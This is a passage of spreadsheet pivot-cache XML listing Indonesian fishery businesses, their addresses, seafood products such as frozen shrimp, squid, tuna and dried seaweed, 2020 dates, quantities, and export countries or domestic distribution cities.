    <s v="PT, SUMBER PANGAN NUSANTARA"/>
    <s v="Jl, Raya Buduran No,555, Kel, Buduran, Kec, Buduran, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Hasil Budidaya Beku (Nila, Bandeng, Lele)"/>
    <d v="2020-05-26T00:00:00"/>
    <n v="250000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20429"/>
    <x v="354"/>
    <s v="PT. SARIFEED INDOJAYA"/>
    <s v="Jl. Pelabuhan No. 35, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Tepung Ikan"/>
    <d v="2020-09-07T00:00:00"/>
    <n v="1200000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20548"/>
    <x v="355"/>
    <s v="PT. HONGXIN ALGAE INTERNATIONAL"/>
    <s v="Jl. Pesisir Timur RT 01 RW 01, Kel. Klatakan, Kec. Kendit, Kabupaten Situbondo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-05-12T00:00:00"/>
    <n v="1080000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20598"/>
    <x v="188"/>
    <s v="PT. LAUT UNITED"/>
    <s v="Jl. Pelabuhan Perikanan Samudera Belawan No.42, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="15260"/>
    <m/>
    <s v="Italy"/>
  </r>
  <r>
    <n v="20599"/>
    <x v="188"/>
    <s v="PT. LAUT UNITED"/>
    <s v="Jl. Pelabuhan Perikanan Samudera Belawan No.42, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara"/>
    <n v="2"/>
    <s v="Ikan Demersal Beku (Malong, Gulama, Biji Nangka, Kerapu, Layur, Sukang, Beloso, Bawal, Kakap, Kurisi)"/>
    <d v="2020-06-09T00:00:00"/>
    <n v="25870"/>
    <m/>
    <s v="Egypt"/>
  </r>
  <r>
    <n v="20600"/>
    <x v="208"/>
    <s v="PT, PEDULI LAUT MALUKU"/>
    <s v="Jl, Raya Tulehu, Dusun Mamokeng, Desa Tulehu, Kec, Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Utuh Segar"/>
    <d v="2020-04-22T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20628"/>
    <x v="356"/>
    <s v="CV. TUNAS INTI NASIONAL"/>
    <s v="JL. Margomulyo No. 44/OO-1 Surabaya, Kel. Asem Rowo, Kec. Asem Rowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ubur-ubur Asin"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="70000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20696"/>
    <x v="357"/>
    <s v="CV. SAKURA PRIMA"/>
    <s v="Dusun Naukkaluku, Desa Lalatedong, Kec. Sendana, Kabupaten Majene&lt;br&gt;Sulawesi Barat"/>
    <n v="30"/>
    <s v="Ikan Terbang Bakar Kering"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20697"/>
    <x v="357"/>
    <s v="CV. SAKURA PRIMA"/>
    <s v="Dusun Naukkaluku, Desa Lalatedong, Kec. Sendana, Kabupaten Majene&lt;br&gt;Sulawesi Barat"/>
    <n v="30"/>
    <s v="Ikan Pelagis Beku (Terbang)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="150000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20698"/>
    <x v="357"/>
    <s v="CV. SAKURA PRIMA"/>
    <s v="Dusun Naukkaluku, Desa Lalatedong, Kec. Sendana, Kabupaten Majene&lt;br&gt;Sulawesi Barat"/>
    <n v="30"/>
    <s v="Cephalopoda Beku (Gurita, Cumi-cumi)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20699"/>
    <x v="357"/>
    <s v="CV. SAKURA PRIMA"/>
    <s v="Dusun Naukkaluku, Desa Lalatedong, Kec. Sendana, Kabupaten Majene&lt;br&gt;Sulawesi Barat"/>
    <n v="30"/>
    <s v="Ikan Demersal Beku (Layur)"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20744"/>
    <x v="304"/>
    <s v="PT. SUMBER PANGAN NUSANTARA"/>
    <s v="Jl. Brigjen Katamso No.24-26, Kel. Kampung Dalem, Kec. Kediri, Kota Kediri&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Lobster Beku"/>
    <d v="2020-05-20T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20765"/>
    <x v="145"/>
    <s v="PT. PAHALA BAHARI NUSANTARA"/>
    <s v="Kawasan Industri Karyadeka Pancamurni Kav. B3, Kel. Pasirsari, Kec. Cikarang Selatan, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Bola Tuna Artery Beku"/>
    <d v="2020-05-05T00:00:00"/>
    <n v="940"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20770"/>
    <x v="50"/>
    <s v="PT. MARINDO MAKMUR USAHA JAYA"/>
    <s v="Jl. Muncul Industri II, Kel. Gedangan, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Makarel Beku"/>
    <d v="2020-04-16T00:00:00"/>
    <n v="1590000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20773"/>
    <x v="358"/>
    <s v="PT. NIRVANA NIAGA SEJAHTERA"/>
    <s v="Jl. Kima 6 Kav F3/B1 - F3/B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="336000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20774"/>
    <x v="358"/>
    <s v="PT. NIRVANA NIAGA SEJAHTERA"/>
    <s v="Jl. Kima 6 Kav F3/B1 - F3/B2 Kawasan Industri Makassar, Kel. Daya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20793"/>
    <x v="133"/>
    <s v="PT. HOLI MINA JAYA"/>
    <s v="Jl. Raya Semarang-Tuban, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Udang Pasteurisasi Pouch"/>
    <d v="2020-08-05T00:00:00"/>
    <n v="300"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20799"/>
    <x v="359"/>
    <s v="CV. HOKKY SEAFOOD"/>
    <s v="Jl. Perintis Kemerdekaan Ruko 237 No.17-18, Kel. Sudiang, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Kepiting Hidup"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20863"/>
    <x v="342"/>
    <s v="CV, BEE JAY SEAFOODS"/>
    <s v="Jl, Tanjung Tembaga Barat Pelabuhan Mayangan, Kel, Mayangan, Kec, Mayangan, Kota Probolinggo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-07-01T00:00:00"/>
    <n v="240000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="20864"/>
    <x v="360"/>
    <s v="PT. MULTI PRAWN INDONESIA"/>
    <s v="Jl. Gatot Subroto Ds. Karangbong, Kel. Karangbong, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="432000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20865"/>
    <x v="360"/>
    <s v="PT. MULTI PRAWN INDONESIA"/>
    <s v="Jl. Gatot Subroto Ds. Karangbong, Kel. Karangbong, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Rebus Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="24000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20866"/>
    <x v="360"/>
    <s v="PT. MULTI PRAWN INDONESIA"/>
    <s v="Jl. Gatot Subroto Ds. Karangbong, Kel. Karangbong, Kec. Gedangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Udang Berlapis Tepung Beku"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="48000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="20947"/>
    <x v="361"/>
    <s v="CV. ANUGRAH ANDALAN NELAYAN"/>
    <s v="Kawasan Pelabuhan Muara Angke No.25, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Cumi-cumi)"/>
    <d v="2020-08-03T00:00:00"/>
    <n v="50"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="21037"/>
    <x v="362"/>
    <s v="PT. SARILAUT EKATAMA"/>
    <s v="Jl. Kalianak Barat 75 Blok E Kav 6-8, Kel. Genting Kalianak, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-06-22T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="21038"/>
    <x v="362"/>
    <s v="PT. SARILAUT EKATAMA"/>
    <s v="Jl. Kalianak Barat 75 Blok E Kav 6-8, Kel. Genting Kalianak, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Malong, Gulama, Lencam, Senangin, Manyung, Kerapu, Layur, Sukang, Kakap, Kaci-kaci, Kuro)"/>
    <d v="2020-06-22T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="21039"/>
    <x v="362"/>
    <s v="PT. SARILAUT EKATAMA"/>
    <s v="Jl. Kalianak Barat 75 Blok E Kav 6-8, Kel. Genting Kalianak, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Kembung, Cakalang, Tenggiri)"/>
    <d v="2020-06-22T00:00:00"/>
    <n v="180000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="21092"/>
    <x v="259"/>
    <s v="PT. SULTRATUNA SAMUDRA"/>
    <s v="Kompleks Pelabuhan Perikanan Samudera Kendari, Jl. Samudera No.1, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara"/>
    <n v="27"/>
    <s v="Cephalopoda Rebus Beku (Gurita)"/>
    <d v="2020-06-23T00:00:00"/>
    <n v="229000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21154"/>
    <x v="363"/>
    <s v="CV. ADIWANDY HANANIA MANDIRI"/>
    <s v="Jl. Ir. Sutami Kawasan Pergudangan Pattene 88 Cluster Green Park Blok A3 No.3, Kel. Temmapaduae, Kec. Marusu, Kabupaten Maros&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-06-12T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="21156"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Beku"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="105000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="21163"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Teripang Kering"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="21165"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Rumput Laut Kering"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="70000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="21167"/>
    <x v="150"/>
    <s v="CV. TIRTA SURYA SRI REJEKI"/>
    <s v="Komplek Industri Ragam Jemundo BB 11 Desa Jemundo, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ubur-ubur Asin"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="80000"/>
    <m/>
    <s v="China"/>
  </r>
  <r>
    <n v="21196"/>
    <x v="364"/>
    <s v="UD. SAMUDRA KENCANA"/>
    <s v="Jl. Pura Segara, Dusun Munduk , Kel. Pengambengan, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tepung Ikan"/>
    <d v="2020-07-22T00:00:00"/>
    <n v="720000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="21302"/>
    <x v="365"/>
    <s v="AGUNG NURI WIJAYA"/>
    <s v="Jl. Balikpapan 2 / 03 GKB, Kel. Yosowilangun, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Mie Bandeng"/>
    <d v="2020-07-27T00:00:00"/>
    <n v="250"/>
    <s v="Kota Palembang, Kota Jakarta Timur, Kota Bogor, Kabupaten Ponorogo, Kabupaten Kediri, Kabupaten Malang, Kabupaten Jember, Kabupaten Banyuwangi, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Kediri, Kota Malang, Kota Pasuruan, Kota Surabaya, Kota Tangerang, Kota Denpasar, Kota Mataram, Kota Kendari"/>
    <m/>
  </r>
  <r>
    <n v="19582"/>
    <x v="238"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Banjarmasin, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="19823"/>
    <x v="366"/>
    <s v="CV. MINA SUKSES SENTOSA"/>
    <s v="Jl. Dermaga Ujung 2 No.2 RT 001 RW 022, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Tongkol, Cobia, Kembung, Selayang, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-04-15T00:00:00"/>
    <n v="1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19831"/>
    <x v="366"/>
    <s v="CV. MINA SUKSES SENTOSA"/>
    <s v="Jl. Dermaga Ujung 2 No.2 RT 001 RW 022, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal, Malong, Gulama, Lencam, Manyung, Kerapu, Layur, Kakatua, Talang-talang, Kakap Merah, Kapas-kapas, Kuro, Ekor Kuning, Seabass)"/>
    <d v="2020-04-15T00:00:00"/>
    <n v="1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19833"/>
    <x v="366"/>
    <s v="CV. MINA SUKSES SENTOSA"/>
    <s v="Jl. Dermaga Ujung 2 No.2 RT 001 RW 022, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-04-15T00:00:00"/>
    <n v="1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19586"/>
    <x v="238"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Bernilai Tambah Beku (Calamari Katsu, Cumi-cumi Crispy, Idako, Kurage, Sate Calamari, Sate Tentakel, Sate Idako) "/>
    <d v="2020-02-04T00:00:00"/>
    <n v="200000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="19585"/>
    <x v="238"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Nugget Ikan, Katsu, Stick Ikan, Tempura, Ikan Pop, Fillet, Steak, Kani Katsu, Scallop Katsu)  "/>
    <d v="2020-02-04T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="19587"/>
    <x v="238"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Bernilai Tambah Beku (Ebi Furai, Ebi Tempura, Ebi Katsu, Nugget Udang, Siomay Udang, Sate Udang, Shrimp Butterfly Katsu, Spring Roll, Udang Pop)"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Medan, Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="20709"/>
    <x v="223"/>
    <s v="PT. INSAN CITRAPRIMA SEJAHTERA"/>
    <s v="Jl. Raya Jenu - Merak Urak No.148 C, Kel. Sekardadi, Kec. Jenu, Kabupaten Tuban&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Ebi Khinchaku, Kue Ikan, Kekian, Siomay Ikan, Otak-otak Ikan, Bakso Ikan, Sosis Ikan, Scallop Surimi, Bola Keju Ikan, Nugget Ikan)"/>
    <d v="2020-05-15T00:00:00"/>
    <n v="60000"/>
    <s v="Kabupaten Rembang, Kabupaten Pati, Kabupaten Kudus, Kabupaten Kediri, Kabupaten Malang, Kabupaten Sidoarjo, Kabupaten Jombang, Kabupaten Bojonegoro, Kabupaten Tuban, Kabupaten Lamongan, Kabupaten Gresik, Kabupaten Pamekasan, Kota Malang, Kota Surabaya, Kota Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="19588"/>
    <x v="238"/>
    <s v="PT. RED RIBBON INDONESIA"/>
    <s v="Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Lencam, Manyung, Kerapu, Layur, Sukang, Bawal, Kakap, Kaci-kaci, Kurisi)"/>
    <d v="2020-02-04T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Bandar Lampung, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kota Surakarta, Kota Surabaya, Kabupaten Tangerang, Kabupaten Gianyar, Kota Balikpapan, Kota Makassar"/>
    <m/>
  </r>
  <r>
    <n v="19319"/>
    <x v="367"/>
    <s v="PT. INDO KREASI ANDALAN NUSANTARA"/>
    <s v="Pergudangan Safe N Lock Blok K 1718 Jl Lingkar Timur Km 5.5, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="500"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Malang, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19318"/>
    <x v="367"/>
    <s v="PT. INDO KREASI ANDALAN NUSANTARA"/>
    <s v="Pergudangan Safe N Lock Blok K 1718 Jl Lingkar Timur Km 5.5, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Demersal Beku (Barramundi, Gulama, Lencam, Sebelah, Manyung, Kuwe, Kerapu, Layur, Kakatua, Bawal, Kakap, Kurisi, Ekor Kuning)"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="100"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Malang, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Lamongan, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19317"/>
    <x v="367"/>
    <s v="PT. INDO KREASI ANDALAN NUSANTARA"/>
    <s v="Pergudangan Safe N Lock Blok K 1718 Jl Lingkar Timur Km 5.5, Kel. Rangkah Kidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Ikan Pelagis Beku (Baby Tuna, Tongkol, Deho, Kembung, Makerel, Sarden, Banjar, Layang, Cakalang, Tenggiri)"/>
    <d v="2020-02-14T00:00:00"/>
    <n v="10000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Malang, Kabupaten Probolinggo, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kabupaten Mojokerto, Kabupaten Lamongan, Kabupaten Gresik, Kota Surabaya"/>
    <m/>
  </r>
  <r>
    <n v="19426"/>
    <x v="368"/>
    <s v="CV. GEMA ANDIKA PRATAMA"/>
    <s v="Pergudangan 88, Jl. Pesing Poglar No.76A RT 004 RW 002, Kel. Kedaung Kaliangke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Bawal Hitam, Sebelah)"/>
    <d v="2020-03-27T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="20457"/>
    <x v="200"/>
    <s v="PT. FISHINDO INDAH TAMA"/>
    <s v="Jl. Marunda Makmur No.368 Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Segar, Trout Segar"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="730"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="20460"/>
    <x v="200"/>
    <s v="PT. FISHINDO INDAH TAMA"/>
    <s v="Jl. Marunda Makmur No.368 Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Salmon Beku, Trout Beku"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="35"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="20461"/>
    <x v="200"/>
    <s v="PT. FISHINDO INDAH TAMA"/>
    <s v="Jl. Marunda Makmur No.368 Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Demersal Beku (Flounder, Halibut, Striped Jack)"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="5"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="20462"/>
    <x v="200"/>
    <s v="PT. FISHINDO INDAH TAMA"/>
    <s v="Jl. Marunda Makmur No.368 Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Beku (Amberjack, Makerel, Kod, Hamachi, Salem, Seabream, Seabass)"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="10"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="20458"/>
    <x v="200"/>
    <s v="PT. FISHINDO INDAH TAMA"/>
    <s v="Jl. Marunda Makmur No.368 Kavling Baru Dusun I No.95 RT 002 RW 022, Kel. Segara Makmur, Kec. Tarumajaya, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Ikan Pelagis Segar (Amberjack, Makerel, Kod, Hamachi, Salem, Seabream, Seabass)"/>
    <d v="2020-10-19T00:00:00"/>
    <n v="50"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan"/>
    <m/>
  </r>
  <r>
    <n v="20379"/>
    <x v="369"/>
    <s v="PT. DELTA MINA PERKASA"/>
